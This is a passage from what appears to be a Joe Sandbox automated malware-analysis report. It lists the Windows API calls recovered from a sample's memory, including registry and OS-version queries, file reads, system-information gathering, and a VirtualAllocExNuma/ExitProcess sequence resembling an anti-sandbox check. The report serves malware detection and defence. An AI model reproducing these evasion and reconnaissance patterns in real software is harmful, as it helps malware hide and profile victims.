                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                      • String ID:
                                                      • API String ID: 3066467675-0
                                                      • Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction ID: 241b920f82534712aa5548f1850683a9f1ba9fbfc84c930526b3dc379e8b0192
                                                      • Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction Fuzzy Hash: 5541B370A00305AFDB24CF54DC88F9AB7B5FF88755F14806DE9199B290E7719A42CFA4
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417E98
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 702443124-4289949731
                                                      • Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction ID: 76ed7461fbfc9217e49c2ea02518e7ea48320d37208f920ac55b1611293e244f
                                                      • Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction Fuzzy Hash: ED2193313083008BD724DE2CE880A6BB7F5AB95714B204A6FF5968B781D779DC858769
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422AFC
                                                      • RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00422A79), ref: 00422B1B
                                                      • RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
                                                      • RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: CurrentBuildNumber
                                                      • API String ID: 3466090806-1022791448
                                                      • Opcode ID: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
                                                      • Instruction ID: e4efa8e5db0ad91907f3ecacc4057bf76477b8c471b957b80fd295e858fd28ec
                                                      • Opcode Fuzzy Hash: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
                                                      • Instruction Fuzzy Hash: 43019E75A00318BFD314DFA0AC59FEB7BB9AB48741F100099FE4597241EAB169048BA0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422A65
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422A6C
                                                        • Part of subcall function 00422AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
                                                        • Part of subcall function 00422AE0: HeapAlloc.KERNEL32(00000000), ref: 00422AFC
                                                        • Part of subcall function 00422AE0: RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00422A79), ref: 00422B1B
                                                        • Part of subcall function 00422AE0: RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
                                                        • Part of subcall function 00422AE0: RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F
                                                      • RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00419650), ref: 00422AA1
                                                      • RegQueryValueExA.ADVAPI32(00419650,02D8DDB8,00000000,00000000,00000000,000000FF), ref: 00422ABC
                                                      • RegCloseKey.ADVAPI32(00419650), ref: 00422AC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3466090806-2517555085
                                                      • Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction ID: a9c7c9cb406362f8c98b7ce0903b7f6c91ff65f0f4129b57f21ef6d77cd7d43d
                                                      • Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction Fuzzy Hash: 0D01AD71700319BFDB24DBA4AD49EEA777EEB44715F000159FE09D3290EAB499448BE0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02C92CCC
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C92CD3
                                                        • Part of subcall function 02C92D47: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02C92D5C
                                                        • Part of subcall function 02C92D47: RtlAllocateHeap.NTDLL(00000000), ref: 02C92D63
                                                        • Part of subcall function 02C92D47: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02C92CE0), ref: 02C92D82
                                                        • Part of subcall function 02C92D47: RegQueryValueExA.ADVAPI32(02C92CE0,0043509C,00000000,00000000,00000000,000000FF), ref: 02C92D9C
                                                        • Part of subcall function 02C92D47: RegCloseKey.ADVAPI32(02C92CE0), ref: 02C92DA6
                                                      • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02C898B7), ref: 02C92D08
                                                      • RegQueryValueExA.ADVAPI32(02C898B7,00638C34,00000000,00000000,00000000,000000FF), ref: 02C92D23
                                                      • RegCloseKey.ADVAPI32(02C898B7), ref: 02C92D2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3225020163-2517555085
                                                      • Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction ID: 17d220b1673d20959198d655b0752d468c0e236664f15c6940408a5b0212a564
                                                      • Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction Fuzzy Hash: CB01ADB5600308BFEB14DBA4EC4DEEA7B7EEB44315F001159FE09D7290DAB09A448BE1
                                                      APIs
                                                        • Part of subcall function 02C77A37: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02C77A6C
                                                        • Part of subcall function 02C77A37: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 02C77AB1
                                                        • Part of subcall function 02C77A37: strlen.MSVCRT ref: 02C77AE5
                                                        • Part of subcall function 02C77A37: StrStrA.SHLWAPI(?,00434ACC), ref: 02C77B1F
                                                        • Part of subcall function 02C77A37: strcpy_s.MSVCRT ref: 02C77B48
                                                        • Part of subcall function 02C77A37: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77B53
                                                        • Part of subcall function 02C77A37: HeapFree.KERNEL32(00000000), ref: 02C77B5A
                                                        • Part of subcall function 02C77A37: strlen.MSVCRT ref: 02C77B67
                                                      • lstrcat.KERNEL32(00638E68,00434ADC), ref: 02C77CF7
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 02C77D24
                                                      • lstrcat.KERNEL32(00638E68,00434AE0), ref: 02C77D36
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 02C77D57
                                                      • wsprintfA.USER32 ref: 02C77D77
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C77DA0
                                                      • lstrcat.KERNEL32(00638E68,00000000), ref: 02C77DAE
                                                      • lstrcat.KERNEL32(00638E68,00434ADC), ref: 02C77DC7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID:
                                                      • API String ID: 2460923012-0
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C963A1
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C963C0
                                                      • memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 02C9641B
                                                      • memcpy.MSVCRT(00000010,?,?), ref: 02C9643F
                                                      • memcpy.MSVCRT(00000000,?,?), ref: 02C96454
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C96547
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy$memmove
                                                      • String ID:
                                                      • API String ID: 1795094292-0
                                                      APIs
                                                      • memset.MSVCRT ref: 02C8DC2D
                                                      • RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?), ref: 02C8DC4C
                                                      • RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,00000000,000000FF), ref: 02C8DC70
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C8DC7A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8DC9F
                                                      • lstrcat.KERNEL32(?,00638968), ref: 02C8DCB3
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                                      • String ID:
                                                      • API String ID: 2623679115-0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C79F0F
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02C79F41
                                                      • StrStrA.SHLWAPI(00000000,00434C28), ref: 02C79F6A
                                                      • memcmp.MSVCRT(?,0042D67C,00000005), ref: 02C79FA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocLocallstrcpymemcmp
                                                      • String ID: $<LC
                                                      • API String ID: 4154055062-3067866279
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8EE6B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8EE9A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8EEA8
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8EEC1
                                                      • lstrcat.KERNEL32(?,00638DF8), ref: 02C8EED4
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8EEE6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0040140E), ref: 00409A9A
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040140E), ref: 00409AB0
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,0040140E), ref: 00409AC7
                                                      • ReadFile.KERNEL32(00000000,00000000,?,0040140E,00000000,?,?,?,0040140E), ref: 00409AE0
                                                      • LocalFree.KERNEL32(?,?,?,?,0040140E), ref: 00409B00
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040140E), ref: 00409B07
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,02C71675), ref: 02C79D01
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,02C71675), ref: 02C79D17
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,02C71675), ref: 02C79D2E
                                                      • ReadFile.KERNEL32(00000000,00000000,?,02C71675,00000000,?,?,?,02C71675), ref: 02C79D47
                                                      • LocalFree.KERNEL32(?,?,?,?,02C71675), ref: 02C79D67
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02C71675), ref: 02C79D6E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      APIs
                                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02C93701
                                                      • GetLastError.KERNEL32 ref: 02C9370B
                                                        • Part of subcall function 02C94207: GetProcessHeap.KERNEL32(00000000,?,02C777DF), ref: 02C9420E
                                                        • Part of subcall function 02C94207: HeapFree.KERNEL32(00000000), ref: 02C94215
                                                      • wsprintfA.USER32 ref: 02C937A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$ErrorFreeInformationLastLogicalProcessProcessorwsprintf
                                                      • String ID: LC$LC
                                                      • API String ID: 879827129-528129335
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004089CD
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      • memcpy.MSVCRT(?,00000000,?,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 2202983795-4289949731
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02C93079
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C93080
                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 02C9308F
                                                      • wsprintfA.USER32 ref: 02C930BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                      • String ID: wwww
                                                      • API String ID: 3317088062-671953474
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,02C78ED2,00000000,?,?,00000000), ref: 02C78FC9
                                                      • std::exception::exception.LIBCMT ref: 02C78FE4
                                                      • __CxxThrowException@8.LIBCMT ref: 02C78FF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: $KC$$KC
                                                      • API String ID: 3448701045-807291510
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CodeInfoPageValidmemset
                                                      • String ID:
                                                      • API String ID: 703783727-0
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00422070), ref: 00421D42
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
                                                        • Part of subcall function 004219F0: lstrlenA.KERNEL32(02D65E50,00000000,00000000,?,?,00421D51), ref: 00421A30
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
                                                        • Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
                                                        • Part of subcall function 004219F0: lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421AA3
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
                                                        • Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421AD0
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF
                                                      • sscanf.NTDLL ref: 00421D6A
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D86
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D96
                                                      • ExitProcess.KERNEL32 ref: 00421DB3
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?), ref: 02C91FA9
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C91C86
                                                        • Part of subcall function 02C91C57: lstrlen.KERNEL32(00638DEC), ref: 02C91C97
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CBE
                                                        • Part of subcall function 02C91C57: lstrcat.KERNEL32(00000000,00000000), ref: 02C91CC9
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CF8
                                                        • Part of subcall function 02C91C57: lstrlen.KERNEL32(00434FA8), ref: 02C91D0A
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D2B
                                                        • Part of subcall function 02C91C57: lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91D37
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D66
                                                      • sscanf.NTDLL ref: 02C91FD1
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 02C91FED
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 02C91FFD
                                                      • ExitProcess.KERNEL32 ref: 02C9201A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      • Opcode ID: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                                                      • Instruction ID: 0b8f2e842b2ae211644ed56093c7604d36c3a5fe272e32ccb975a49ea20c42a5
                                                      • Opcode Fuzzy Hash: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                                                      • Instruction Fuzzy Hash: A721DFB1508301AF8754DF69D88595BBBF9EFD8214F40AA1EF599C3220E770D6048FA6
APIs
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02C712AD
• VirtualAllocExNuma.KERNEL32(00000000), ref: 02C712B4
• ExitProcess.KERNEL32 ref: 02C712BF
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 02C712D3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 02C71312
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocProcess$CurrentExitFreeNuma
• String ID:
• API String ID: 3477276466-0
• Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
• Instruction ID: ba2f0fdf3bd779b0d115f24cb180a61995891ccfb17e2258ea8cab6dd152ac03
• Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
• Instruction Fuzzy Hash: 7901F4717403047BEB144AA56C1EF6B77EEA785B15F309019F708E7280DAB1EA008AB8
APIs
• memcpy.MSVCRT(?,?,00000040), ref: 00406F00
• memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
• GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
• HeapAlloc.KERNEL32(00000000), ref: 00406F7B
Strings
Memory Dump Source
• Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_ED60.jbxd
Yara matches
Similarity
• API ID: Heapmemcpy$AllocProcess
• String ID: @
• API String ID: 1643994569-2766056989
• Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
• Instruction ID: e1db0f0f00307df363e64ad8a88bb248863c5a506cdc1b59983cb41b111b7395
• Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
• Instruction Fuzzy Hash: 92118E70600602CBDB258F60DD84BBB73A4EB40704F054839F946DB6C4FBB8E955CB68
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C7139C
• RtlAllocateHeap.NTDLL(00000000), ref: 02C713A3
• RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 02C713C0
• RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 02C713DA
• RegCloseKey.ADVAPI32(?), ref: 02C713E4
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID:
• API String ID: 3225020163-0
• Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
• Instruction ID: 85d0b46f3a5246e082a517c28eda18ecd5f2bef013126fe0b377bd095e7eeae6
